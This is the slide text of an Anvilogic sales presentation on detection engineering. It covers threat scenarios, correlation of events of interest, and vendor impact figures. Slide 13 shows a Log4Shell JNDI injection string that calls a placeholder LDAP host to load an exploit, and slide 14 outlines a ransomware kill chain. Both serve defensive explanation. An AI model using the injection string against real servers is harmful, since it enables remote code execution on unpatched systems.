  • 2. ANVILOGIC Inc. C O N F I D E N T I A L 2 Andrew D’Auria - whoami? ● Director of Sales Engineering at Anvilogic ● Software industry since 1996 ● CISSP since 2015 ● Splunk, McAfee, Surfcontrol, NetForensics, RSA, and others ● Managing, coaching, and hiring Sales Engineers since 2018 ● Native of NYC, living in Wake Forest, NC (Raleigh) since 2007 ● Married to Ilissa for 24 years, with 2 daughters Jessica (17) and Julie (14) ● Will play anything with frets, but especially electric guitar since 1988 ● Love to hike, grill, eat, drink, smoke a pipe/cigar, draw, paint
  • 3. ANVILOGIC Inc. C O N F I D E N T I A L Data Science Insights & Models Core Security Operations Functions 3 Cloud Only Detection Eng. Mature/Maintain Accelerated Detection Insights, Improve Purple Team / Threat Research Hunt Become Proactive Triage Smarter, Faster Analysis Respond Automate Response
  • 4. ANVILOGIC Inc. C O N F I D E N T I A L 4 Detection Engineering - The Current Way 1. Manual Research (ex. Google, Github) Identify Threat Research 48 hr 2. Track / Feedback (ex. JIRA) Create Ticket 1 hr 3. Develop, Test, Deploy (ex. SIEM) Build Test 4. Document Use Case (ex. Confluence) Runbook 3 hr Deploy 20 hr 5. Metrics & Reporting (ex. Qlikview) Maintain/Tune KPIs Disjoint People, Process, Technology Start End 3-5 Days Each 2-3+ Teams 5+ Tools x 3 Times = +15D Log4Shell Attack (3 Use Cases (exploit, .exe, C2)
  • 5. ANVILOGIC Inc. C O N F I D E N T I A L 5 1 Detection engineering is ● slow ● difficult ● results in noisy false positives delivered to the SOC 2 3 Bringing all data into a centralized SIEM data store is ● expensive ● difficult especially in hybrid cloud environments There is no good way to ● track MITRE ATT&CK technique coverage ● measure maturity progress in real time ● identify gaps and measure risk What are the problems with detection engineering today?
  • 6. ANVILOGIC Inc. C O N F I D E N T I A L How can we measure the effectiveness of our DE program? 6 Collection Detection Response • Data Coverage • Data Quality • Data Availability • Detection Coverage • Detection Quality • Lifecycle Management • Alert Management • Workflow • Speed • Accuracy Strategic Maturity How Are We Performing? How Can We Perform Better? Where Can We Perform Better? Organizational Risk? Industry-Specific Risk? Technology-Specific Risk? Communicating Value? Operational Maturity
  • 7. ANVILOGIC Inc. C O N F I D E N T I A L Typical vs. Ideal Detection → Pyramid of Pain Typical • IOC Driven • Very time limited • Lack of Context • Whack-a-mole Image Source: David Bianco’s blog - http://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html Ideal • Tool & Behavior Driven • Very hard for adversaries to change • Long term strategic value for detections
  • 8. ANVILOGIC Inc. C O N F I D E N T I A L Content 2.0 8 Events Events of Interest Alerts Traditional Alerts Threat Scenarios Risk Thresholds
  • 9. ANVILOGIC Inc. C O N F I D E N T I A L Threat Identifiers and Threat Scenarios 9 Threat Scenario Entity ‘X' Entity ‘X' Entity ‘X' + + Threat Identifier Event ID = “1234” AND (Process Name = “XYZ” OR Process Name = “ABC”) Events of Interest Event of Interest “A” AND (60 Minutes) Event of Interest “B” AND (5 hours) Event of Interest “C”
  • 10. ANVILOGIC Inc. C O N F I D E N T I A L Hunting Index - AKA: Events of Interest ● Correlating TTPs or Events of Interest
  • 11. ANVILOGIC Inc. C O N F I D E N T I A L Modern Security Operations 11 Hunt & Correlate Tag, Normalize, Enrich Case/Ticketing & SOAR Detection Engineering, Alerting, Triage, Hunting, and Response Across Modern Hybrid Data Environments Analyst Activity Triage Threat Scenarios Auto-Threat Detection No Code - Build Rules Detection Recommendations Security & IT Products (ex. EDR, AV, Cloud) Logs Logging Platforms (ex. Splunk, Snowflake, Azure) Query & Import API Query API Pull API Store Identifiers (EOIs)
  • 13. ANVILOGIC Inc. C O N F I D E N T I A L 13 Example: Log4Shell Attack Pattern Attacker Victim Security Operations Center Response {$jndi:ldap://1.2.3.4/Exploit} 1 2 java.exe <Payload Class> 3 Establish C2 Detection Engineers Research, Test, Document, Deploy Alert 3 1000s alerts Alert 1 Alert 2 SOC Triage 3-5 Days Build MITRE Attack Detections 1 2 3 + + Easy Correlation - No Code Required! Initial Access Execution C2 Workspace & Tasks Track Tune, Versions Test, Deploy Improve, Mature Maintain Research Exploit in Lab Develop, Test, Share Threat Research Reduce Alert Volume, Improve Dwell Time Attack Scenario 1 2 3 + + Triage Under 2 Hours Anvilogic Platform for Threat Detection, Investigation, and Response (TDIR)
  • 14. ANVILOGIC Inc. C O N F I D E N T I A L 1 4 Example: Ransomware Attack Pattern Start Windows Macro Execution An employee opens a malicious attachment that runs a macro Stage 1: Initial Access 1 Cobalt Strike Abnormal Web Connection Machine makes abnormal web connection to malware payload domain and establishes persistence +60m 3 Stage 3: Command & Control Stage 2: Installation Encoded PowerShell Command Macro spawns an encoded command in powershell +30s 2 Word Doc Last Chance to Detect! Stage 4: Discovery AD Find Execution Attacker uses adfind to gather active directory information for internal reconnaissance +60m Batch File </> 4 4 Rules 1 Correlation How Long? + = +
  • 15. ANVILOGIC Inc. C O N F I D E N T I A L 15 Anvilogic Impacts - 50B Financial Services +180 EDR RULES 111 CLOUD 97 ENDPOINT 31 WEB +403 CUSTOM 55 Azure Rules Improved by +31% 20 AWS Rules Improved by +75% 12 GCP Rules Improved by +17% 24 O365 Rules Improved by +21% 12 Proxy Rules Improved by +30% 19 Web App Rules Improved by +40% 55 Windows Rules Improved by +55% 42 Linux Rules Improved by +90% 180 EDR Rules Linux & Windows 51 SCENARIOS 239 IDENTIFIERS 17 MACROS 8.14M Warnings 300+ Identifiers 351 Alerts 10+ Scenarios 8.1T Raw Events 4,000+ Sourcetypes USE CASES 454 DEPLOYED 5.8 Alerts per day UPLOADS DOWNLOADS ~2m ● Increased Overall Detections by 91% ● Saved up to 6,500+ hours of engineering time Anvilogic Framework Impacts (60 Days)
  • 16. ANVILOGIC Inc. C O N F I D E N T I A L Key Takeaways & Next Steps ● Effective detection engineering requires good data, process, and measurement ● Not every detection requires an alert or action ● Build effective detections based on real-world attack scenarios and risk thresholds ● Pyramid of pain whitepaper https://www.anvilogic.com/learn/whitepaper- pyramid-apex ● Subscribe to our Threat Report anvilogic.com/resources/threat-report